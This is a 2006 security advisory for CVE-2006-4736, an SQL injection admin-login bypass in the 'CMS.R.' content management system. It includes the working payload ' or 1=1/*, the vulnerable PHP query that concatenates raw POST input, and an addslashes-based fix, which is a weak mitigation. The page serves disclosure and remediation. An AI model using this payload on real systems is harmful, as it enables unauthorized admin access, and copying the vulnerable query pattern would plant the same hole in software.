Bug: CMS.R. the Content Management System admin authentication baypass ( Ascii Version )

Search:
WLB2

CMS.R. the Content Management System admin authentication baypass

Published
Credit
Risk
2006.09.18
HACKERS PAL
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2006-4736
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Hello

Title : CMS.R. the Content Management System admin authentication baypass

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net [email concealed]

The Vulnerability works 100% with magic_quotes_gpc = off

put the user name value (' or 1=1/*)

[code]

' or 1=1/*

[/code]

and you will login :)

error file : index.php

line : 48

query :-

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY
username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

solution:-

replace

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY
username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

with

[code]

//

// Fixed By : HACKERS PAL

// WwW.SoQoR.NeT

//

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY
username='".addslashes($_POST['adminname'])."' AND BINARY
pass='".addslashes($_POST['adminpass'])."'";

[/code]

WwW.SoQoR.NeT

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version